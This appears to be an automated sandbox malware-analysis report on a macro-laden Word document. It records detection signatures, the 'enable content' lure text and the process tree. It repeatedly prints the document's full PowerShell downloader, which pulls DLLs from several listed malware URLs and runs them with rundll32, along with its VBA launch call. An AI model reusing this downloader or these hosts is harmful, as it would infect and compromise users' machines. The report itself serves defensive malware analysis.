Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 704.doc

Overview

General Information

Sample Name:704.doc
Analysis ID:526268
MD5:40f85d07da2533d576b1f2d7c043a2da
SHA1:60b84d70a6511483c6de131fb62e30a99edff5c4
SHA256:d05ec2a0134518ec74fcbee94a522c3837d82b7b5d2f162b8466850fc4f1be0d
Infos:

Most interesting Screenshot:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Antivirus detection for URL or domain
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document contains an embedded VBA macro which may execute processes
Obfuscated command line found
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Suspicious powershell command line found
Machine Learning detection for sample
Document contains no OLE stream with summary information
Queries the volume information (name, serial number etc) of a device
Yara signature match
Document has an unknown application name
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to detect virtual machines (SLDT)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Creates a process in suspended mode (likely to inject code)
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 1220 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • cmd.exe (PID: 2420 cmdline: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2776 cmdline: powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\~DF59F33552EDE7EF7C.TMPSUSP_VBA_FileSystem_AccessDetects suspicious VBA that writes to disk and is activated on document openFlorian Roth
  • 0xafc8:$s1: \Common Files\Microsoft Shared\
  • 0xb320:$s1: \Common Files\Microsoft Shared\
  • 0x4447:$s2: Scripting.FileSystemObject
  • 0x557e:$a1: Document_Open
  • 0xa5e7:$a1: Document_Open
  • 0xb9f6:$a1: Document_Open
  • 0xd114:$a1: Document_Open

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 1220, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, ProcessId: 2420
Sigma detected: Windows Suspicious Use Of Web Request in CommandLineShow sources
Source: Process startedAuthor: James Pemberton / @4A616D6573: Data: Command: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 1220, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, ProcessId: 2420
Sigma detected: Non Interactive PowerShellShow sources
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine: powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2420, ProcessCommandLine: powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebReques

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://ckfoods.net/wp-admin/wPInm2rgMu/Avira URL Cloud: Label: malware
Source: http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/Avira URL Cloud: Label: malware
Source: http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/Avira URL Cloud: Label: malware
Machine Learning detection for sampleShow sources
Source: 704.docJoe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdbBB source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb=C:\ source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbamDa source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb:\Pr source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmpString found in binary or memory: http://adorwelding.zmo
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmpString found in binary or memory: http://adorwelding.zmotp
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmpString found in binary or memory: http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBW
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmpString found in binary or memory: http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmpString found in binary or memory: http://ckfoods.net/wp-admin/wP
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmpString found in binary or memory: http://ckfoods.net/wp-admin/wPInm2rgMu/
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmpString found in binary or memory: http://huskysb.com/wordpre
Source: powershell.exe, 00000004.00000002.435665770.0000000002C80000.00000004.00000001.sdmpString found in binary or memory: http://huskysb.com/wordpress/6f0qIQ
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmpString found in binary or memory: http://huskysb.com/wordpress/6f0qIQlWPaYDfa/
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmpString found in binary or memory: http://manak.edunetf
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmpString found in binary or memory: http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmpString found in binary or memory: http://primtalent.com/wp-admin/9
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmpString found in binary or memory: http://primtalent.com/wp-admin/9yt1u/
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmpString found in binary or memory: http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/
Source: powershell.exe, 00000004.00000002.435087637.00000000024B0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000004.00000002.435665770.0000000002C80000.00000004.00000001.sdmpString found in binary or memory: http://server.zmotpro.com/venkat/
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmpString found in binary or memory: http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/
Source: powershell.exe, 00000004.00000002.435665770.0000000002C80000.00000004.00000001.sdmpString found in binary or memory: http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/P
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmpString found in binary or memory: http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/PE
Source: powershell.exe, 00000004.00000002.435087637.00000000024B0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000004.00000002.434822089.00000000002D0000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{58F32F91-EE55-4449-B0B3-F02D5B2E95D2}.tmpJump to behavior

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: I of I Words:
Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. i Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: I of I Words: 0 N@m 13 ;a 10096 G)
Source: Screenshot number: 8Screenshot OCR: ENABLE EDITING" and "ENABLE@TENT" buttons to pcenew INS Document O CI D O Page, 1 of 1 I Wo
Source: Screenshot number: 8Screenshot OCR: DOCUMENT IS PROTECTED Prenewmg os not available for procecled documents CI You have to press "ENAB
Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Screenshot number: 12Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. ii: ^ a S O I @ 10
Source: Screenshot number: 12Screenshot OCR: ENABLE CONTENT" buttons to preview this document. ii: ^ a S O I @ 100% G) A GE)
Document contains an embedded VBA with functions possibly related to ADO stream file operationsShow sources
Source: ~DF59F33552EDE7EF7C.TMP.0.drStream path 'VBA/cvbku3gakuisdgfilu3gblaw' : found possibly 'ADODB.Stream' functions open, read, write
Document contains an embedded VBA macro which may execute processesShow sources
Source: VBA code instrumentationOLE, VBA macro: Module cvbku3gakuisdgfilu3gblaw, Function fjow3efyw98efhasdokfhlnkvawofh3, API Object.Run("cmd.exe /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj",0:Integer)
Source: ~DF59F33552EDE7EF7C.TMP.0.drOLE, VBA macro line: JbxHook_Run_2__ob = jbxthis.Run(jbxparam0, jbxparam1)
Source: 704.docOLE indicator has summary info: false
Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.drOLE indicator has summary info: false
Source: ~DF59F33552EDE7EF7C.TMP.0.drOLE indicator has summary info: false
Source: C:\Users\user\AppData\Local\Temp\~DF59F33552EDE7EF7C.TMP, type: DROPPEDMatched rule: SUSP_VBA_FileSystem_Access date = 2019-06-21, author = Florian Roth, description = Detects suspicious VBA that writes to disk and is activated on document open, reference = Internal Research, score = 52262bb315fa55b7441a04966e176b0e26b7071376797e35c80aa60696b6d6fc
Source: 704.docOLE indicator application name: unknown
Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.drOLE indicator application name: unknown
Source: ~DF59F33552EDE7EF7C.TMP.0.drOLE indicator application name: unknown
Source: 704.docOLE, VBA macro line: Private Sub Document_Open(): Dim gzjohestiha4otihsdoa8ef As String
Source: VBA code instrumentationOLE, VBA macro: Module cvbku3gakuisdgfilu3gblaw, Function Document_Open
Source: ~DF59F33552EDE7EF7C.TMP.0.drOLE, VBA macro line: Private Sub Document_Open()
Source: 704.docOLE indicator, VBA macros: true
Source: ~DF59F33552EDE7EF7C.TMP.0.drOLE indicator, VBA macros: true
Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF59F33552EDE7EF7C.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#.........n.....................................`I.........v.....................K......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#...............ZU.k......................7.............}..v.... .......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../...............:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../...............ZU.k......................7.............}..v.... .......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;...............:T.k......T...............7.............}..v............0.b.....................~.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;...............ZU.k....@.................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.9.............}..v............0.b.............H.T.....$.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G...............ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._...............:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._...............ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k...............:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k...............ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w...............:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w...............ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............e.n.t.L.i.s.t. .$.a.;.b.r.e.a.k.;.}.}.;.;.I.E.X. .$.d.f.k.j.....0.b.............H.T.....<.......(...............
